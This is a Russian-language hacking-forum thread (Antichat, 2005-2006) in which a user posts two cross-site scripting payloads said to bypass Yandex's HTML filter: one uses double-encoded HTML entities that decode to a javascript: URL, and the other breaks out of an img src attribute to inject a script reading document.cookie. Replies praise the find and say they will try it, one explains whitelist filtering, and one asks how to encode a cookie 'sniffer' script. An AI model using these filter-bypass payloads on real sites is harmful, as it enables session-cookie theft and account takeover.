HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS в yandex.ru
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

XSS в yandex.ru
  #1  
Старый 13.05.2005, 01:40
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
По умолчанию XSS в yandex.ru
Вот на yandex нашёл 2 xss.

1.
Код:
<img src="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#55&#38&#35&#49&#48&#56&#38&#35&#49&#48&#49&#38&#35&#49&#49&#52&#38&#35&#49&#49&#54&#38&#35&#52&#48&#38&#35&#49&#48&#48&#38&#35&#49&#49&#49&#38&#35&#57&#57&#38&#35&#49&#49&#55&#38&#35&#49&#48&#57&#38&#35&#49&#48&#49&#38&#35&#49&#49&#48&#38&#35&#49&#49&#54&#38&#35&#52&#54&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#49&#38&#35&#49&#48&#55&#38&#35&#49&#48&#53&#38&#35&#49&#48&#49&#38&#35&#52&#49">
суть в том, что javascript:alert(document.cookie) кодируется к виду &#..., а потом получившаяся строчка ещё раз кодируется по такому же принципу. Фильтр один раз декодирует src и получится такое:
Код:
<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41">
это "javascript..." закодированое 1 раз
а это браузер прекрасно поймёт

2.
Код:
<img src=a"&#62&#60a&#32id&#61xxx&#62&#60&#47a&#62&#60script&#62&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41&#59&#60&#47script&#62&#60&#97&#32&#115&#114&#99&#61&#34>
синим цветом - alert(document.cookie);
Ошибка фильтра опять в том, что неправильно понимает содержимое src и ещё хуже декодирует строки типа &#...
 

  #2  
Старый 13.05.2005, 11:18
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


По умолчанию
круто!
маладца!
 

  #3  
Старый 13.05.2005, 13:01
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Да... я всегда говорил, что тупые методы защиты от Xss бесполезны....)))
 

  #4  
Старый 13.05.2005, 13:22
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


По умолчанию
LittleLamer что то ник не соответствует действительности! Респект за идею,будем пробовать!
 

  #5  
Старый 06.01.2006, 17:49
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
По умолчанию
Я не понимаю разве трудно профильтровать все с htmlspecilachars? ЗАЧЕМ КАКИЕ-ТО ФИЛЬТРЫ? Или я ошибаюсь?
 

  #6  
Старый 06.01.2006, 19:02
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию
ты ошибаешься - фича многих почтовых сервантов с веб интерфейсом в том что они позволяют юзать "приемлимые" теги типа <a>,<img> и тд Поэтому основная задача фильтра допустить использование только тегов из списка причем ключевые слова типа javascript,background и тд должны вырезаться или заменяться как в хакере на ЯваСкрИптъ (или что-то типа того) но бага все равно есть=)) Имхо для обеспечения полной безопасности достаточно дать пользователям использовать все теги только по определённому шаблону... например <aПРОБЕЛhref=УРЛ>ТЕКСТ</a> причем УРЛ и ТЕКСТ не должны содержать опасных символов типа ",<,>,'.
 

  #7  
Старый 18.01.2006, 13:13
pantilxaker
Новичок
Регистрация: 18.10.2005
Сообщений: 11
Провел на форуме:
127217

Репутация: 13
По умолчанию
Мне срочно нужно узнать как закодировать скрипт сниффера!!!
 

  #8  
Старый 18.01.2006, 13:38
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


По умолчанию
Берёшь да кодируешь много программ есть для этого!
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #9  
Старый 18.01.2006, 16:15
pantilxaker
Новичок
Регистрация: 18.10.2005
Сообщений: 11
Провел на форуме:
127217

Репутация: 13
По умолчанию
А например?
 

  #10  
Старый 18.01.2006, 23:44
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
Вот скажите мне, накой поднимать старую тему чтоб тока сморознуть какую-то фигню?
Одно дело бы по сабжу хотяб, а то......Неужели "Болталка" для ОФФТОПА уже не годится???????????????????????

ЗАКРЫТО!
/ме злой
 
Закрытая тема



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.